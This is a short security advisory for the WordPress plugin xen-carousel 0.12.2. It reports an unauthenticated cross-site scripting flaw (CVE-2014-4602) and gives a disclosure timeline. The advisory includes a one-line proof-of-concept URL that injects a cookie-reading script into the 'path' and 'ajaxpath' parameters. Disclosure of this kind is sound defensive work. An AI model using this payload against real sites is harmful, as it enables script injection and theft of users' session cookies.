wp-plugin : xen-carousel

Plugin Details
Plugin Name: wp-plugin : xen-carousel
Effected Version : 0.12.2 (and most probably lower version's if any)
Vulnerability : Cross-Site Scripting (XSS)
Identified by : anantshri
WPScan Reference URL

Technical Details
Minimum Level of Access Required : Unauthenticated
PoC - (Proof of Concept) :

http://localhost/wp-content/plugins/xen-carousel/xencarousel-admin.js.php?path=path’>alert(document.cookie)&ajaxpath=ajaxpath’>alert(document.cookie)&

Vulnerable Parameter : path, ajaxpath


Disclosure Timeline
Vendor Contacted : 2014-01-17
Plugin Status : Updated on
Public Disclosure : May 28, 2014
CVE Number : CVE-2014-4602
Plugin Description :
[| **The balance of form and function.** Call out sections of your site by easily creating a carousel of images, associated to posts or pages, for display on your home page or anywhere on your site. The carousel purposely does not come styled, but is instead semantically marked up with #IDs and .classes to make it easy for you to integrate it into your theme without much effort. ]